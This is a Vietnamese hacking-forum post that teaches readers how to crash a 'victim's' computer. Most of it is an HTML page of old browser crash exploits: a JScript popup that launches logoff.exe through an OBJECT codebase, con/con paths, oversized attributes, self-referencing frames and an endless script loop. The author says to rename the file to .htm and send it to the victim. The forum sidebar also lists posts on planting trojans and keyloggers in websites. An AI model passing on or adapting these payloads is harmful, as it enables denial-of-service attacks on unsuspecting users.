Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin

Shopmotion


Affiliates
free forum


 Hướng dẫn Crash một máy tính

Go down

 Hướng dẫn Crash một máy tính

Post  Admin on Sun May 15, 2011 11:20 am

- Hôm nay tôi sẽ hướng dẫn các bạn cách Crash một máy tính. Cách này rất dễ và hay, nó chỉ dựa trên một lỗ hổng "Explore sd Java scripts" để khai thác, Thường được biết với tên Java trick. Java trick có rất nhiều cách khai thác. Cách này được gọi là "Crash click"
- Đầu tiên bạn copy đoạn code dưới đây vào một file Text (*.txt) rồi vào View --> Folder Option --> View --> bỏ dấu chọn ở ô "hide file extensions for known file types", nó sẽ hiển thị đuôi của các tập tin. Sau đó bạn đổi tên (rename) file Text (*.txt) đó thàng trang Web (*.htm), thế là xong. Cuối cùng là gửi trang web này cho nạn nhân
* Chú ý : Cách Crash không cần nạn nhân phải vào thẳng trang Web (Click chuột 2 lần vào) mà chỉ cần nhấp chuột chọn (Click 1 lần) trang Web đó là bị Crash ngay lập tức. Ngoài ra, cách này không những cho Internet Explorer mà bạn các ứng dụng khác như Dreamwaver vẫn hiệu quả. Không có cách nào vô hiệu hoá được nó ngoài việc Delete (xoá) nó đi.

Code:
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Author" content="Sam">
<meta name="GENERATOR" content="Mozilla/4.6 [en-gb] (Win98; I) [Netscape]">
<meta name="LOVE" content="DEATH">
<meta name="Classification" content="FUN FUN FUN">
<meta name="Description" content="This Is The Source That Will Crash A Computer">
<meta name="KeyWords" content="COMPUTER CRASH TOOLS HAPPINESS">
<title>Computer Crash</title>
</head>
<body text="#FFFFFF" bgcolor="#000000" link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF">

<center><font face="Arial Narrow"><font color="#FFFFFF"><font size=+2>HERE
IS THE SOURCE CODE THAT WILL CRASH YOUR COMPUTER</font></font></font>
<br><font face="Arial Narrow"><font color="#FFFFFF"><font size=+2>IT IS
FROM CYBER ARMY AND IS A BUGGER</font></font></font>
<br><font face="Arial Narrow"><font color="#FFFFFF"><font size=+2>TO GET
SO I DID IT FOR YOU</font></font></font></center>
<font face="Arial Narrow"><font color="#FFFFFF">How To Use It Copy It To
A Raw Text Document and save is as txt then either copy it into a HTML
editor or rename the pure text NAME.html instead of NAME.txt. This won't
always work because the NAMEOFFILE.txt or .html or what ever is removed
so you only get the NAMEOFFILE . You can disable this in windows 98 by
right clicking on your desktop going to the WEB section (inbetween EFFECTS
and SETTINGS) clicking on the FOLDER OPTIONS in the bottom right hand corner,
then click VIEW amd in the ADVANCED SETTINGS Box bellow with loads of sentances
bellow and tick boxes. find the HIDE FILE EXTENSIONS FOR KNOWN FILE TYPES
and untick the box.</font></font>
<center>
<hr WIDTH="100%"></center>
<font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><html></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><head></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><link
rel="fontdef" src="crash47.pfr"></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><style
type="text/css"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>#crash
{position: absolute;}</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></style></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
<SCRIPT language=JScript></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
var programName=new Array(</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
'c:/windows/system32/logoff.exe',</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
'c:/winxp/system32/logoff.exe',</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
'c:/winnt/system32/logoff.exe'</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
);</font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
function Init(){</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
var oPopup=window.createPopup();</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
var oPopBody=oPopup.document.body;</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
var n,html='';</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
for(n=0;n<programName.length;n++)</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111'
CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
oPopBody.innerHTML=html;</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
oPopup.show(290, 390, 200, 200, document.body);</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
}</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
</SCRIPT></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></head></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><BODY
onload="Init()"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><script
language="JavaScript"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>window.open('http://www.cyberarmy.com/winxp123.shtml');</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></script></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><p>&nbsp;</p></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><p><center><h1>Attempting
System Crash Test...</h1></center></p></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><blockquote><p>&nbsp;</p></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>This
test uses about a dozen common pieces of code which test browser bugs.</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>If
this crash test crashes your browser, you should upgrade it. You may be
at this page because you</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>are
choosing to test your browser, or you were trying to brute force cyberarmy,
or maybe just because the</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>server
doesn't like you.<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
con/con crash (various Windows)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><img
SRC="file://c:/con/con"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
invalid JPEG Crash (NS 4.5+)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><img
src="http://www.cyberarmy.com/crash-netscape.jpg"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
bewm! Crash (NS 4.7)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><font
face="arial black, arial,san serif" size=5>bewm!@#$</font></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
bewm!2 Crash (NS 4.5 and earlier)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><div
id="crash"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><table
width=23% height=23%><tr><td></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
bewm!@#$</b></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></td></tr></table></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></div>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><SPAN
STYLE="position:absolute; LEFT:0"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><TABLE
BORDER="0" WIDTH=100%><TR><TD><TABLE><TR><TD></TD></TR><TR><TD></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><TABLE><TR><TD></TD></TR></TABLE></TD></TR></TABLE></TD></TR></TABLE></SPAN>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
Internal Parser Crash (NS 4.04+)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><br><br></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
JS Crash (IE 5.5, etc)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><iframe
id=emarf></iframe></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><script></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>tcejbo
= {};</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>emarf.document.open();</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>emarf.document.write("<s"+"cript>top.tcejbo.emarf=0</s"+"cript>");</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>delete
tcejbo;</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>tcejbo
= {};</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></script></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
NetBunny's Big Form Crash (some IE5)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><table></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><tr></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><td
width="1%"><FORM method="POST"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><input
type="text" name="crash" size="9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999"
maxlength="9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999"
value="crash"></td></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></tr></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></table></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
IMG Width Crash (some IE)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><img
width=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
ClassID Crash (IE)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><OBJECT
CLASSID=file://0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000></OBJECT></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><p>Trying
EMBED SRC Crash (IE 4.0)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><EMBED
SRC="http://C|/A.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
Object Data Loop Crash (various o/s)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><object
data="crash.shtml"></object></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
flash crash (some IE 5+)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><SCRIPT></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>var
color = new Array;</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>color[1]
= "white";</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>color[2]
= "white";</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>for(x
= 0; x <3; x++)</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>{</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
document.bgColor = color[x]</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
if(x == 2)</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
{</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
x = 0;</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>
}</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>}</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></SCRIPT></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Trying
Self Referenced Frames Crash (various o/s)...</font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><FRAMESET
ROWS = 50%,50%></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><FRAME
SRC = "crash.shtml"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2><FRAME
SRC = "crash.shtml"></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></FRAMESET></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>FAILED<br><br></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font> <font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2>Unable
to Crash System</font></font></font><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></body></font></font></font>
<br><font face="Arial,Helvetica"><font color="#FFFFFF"><font size=-2></html></font></font></font>
<br>
<hr WIDTH="100%"><font color="#FFFFFF"></font>
</body>
</html>


 
avatar
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumvi.com

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum